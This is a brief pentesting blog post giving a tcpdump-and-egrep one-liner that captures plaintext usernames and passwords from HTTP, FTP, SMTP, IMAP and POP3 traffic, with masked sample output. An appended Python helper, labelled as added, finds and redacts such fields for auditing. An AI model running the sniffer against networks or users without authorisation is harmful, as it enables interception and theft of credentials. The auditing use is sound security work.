Quick and dirty tcpdump credential (username/password) sniffer
I've been playing for the last few months with mobile pentesting on the Android platform. Since I've been able to set up tcpdump-arm on my Android phone, I began fooling around with it. I was trying to cross-compile Dug Song's dsniff for the armle architecture, but it was only giving me headaches with the libnet/libnids dependencies and such.
So I wrote a quick one-liner to dump potential credentials (username/password) flowing in plaintext over the line:
    tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
And it works well enough:
    .{D.ezENPOST /users/register HTTP/1.1
    Host: www.commandlinefu.com
    ...
    Referer: http://www.commandlinefu.com/users/register
    ...
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 147
    username=jseidl&password=MASKED&password-confirmation=MASKED&email-address=MASKED%MASKED.MASKEDhomepage=MASKED&submit=Sign+me+up
It's not BY FAR as efficient as dsniff, but it can help out sometimes!
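As an added example (not part of the original post), here is a small Python audit helper that does the same job as the egrep filter above but with the values redacted: it scans captured plaintext payload lines, picks out form-encoded fields and FTP/SMTP/POP3-style USER/PASS lines whose field names look credential-bearing, and returns what leaked without writing the secret itself into a report. The sample capture is constructed; the field-name list mirrors the one-liner's regex.

```python
import re
from urllib.parse import parse_qsl

# Field names the page's egrep treats as credential-bearing (case-insensitive).
CRED_KEYS = re.compile(r'^(pass|pwd|log|login|user|username|pw|passw|passwd|password)$', re.I)
# Protocol-style lines such as FTP "USER bob" / "PASS s3cret" or "password: x".
PROTO_LINE = re.compile(r'^\s*(user|pass|username|password|login)[\s:]+(\S+)', re.I)
# A line that starts with key=value is treated as a form-encoded body.
FORM_LINE = re.compile(r'^[\w.-]+=')

# Constructed sample: HTTP request lines followed by an FTP login exchange.
SAMPLE_CAPTURE = """POST /users/register HTTP/1.1
Host: www.example.test
Content-Type: application/x-www-form-urlencoded

username=alice&password=hunter2&email-address=alice%40example.test
USER bob
PASS s3cret
"""


def redact(value):
    """Keep the first character so the analyst can recognise the field, mask the rest."""
    return value[:1] + '*' * (len(value) - 1) if value else ''


def find_cleartext_credentials(payload):
    """Return (field_name, redacted_value) pairs for credential-looking fields in a capture."""
    findings = []
    for line in payload.splitlines():
        if FORM_LINE.match(line):
            # Form body: split into key/value pairs and keep only credential-like keys.
            for key, value in parse_qsl(line, keep_blank_values=True):
                if CRED_KEYS.match(key):
                    findings.append((key.lower(), redact(value)))
            continue
        match = PROTO_LINE.match(line)
        if match:
            findings.append((match.group(1).lower(), redact(match.group(2))))
    return findings


if __name__ == '__main__':
    for name, masked in find_cleartext_credentials(SAMPLE_CAPTURE):
        print(f'cleartext credential field: {name} = {masked}')
```

Non-credential fields such as email-address are left out of the report, so the output can be kept as evidence that an app sends logins in the clear without itself becoming a credential store.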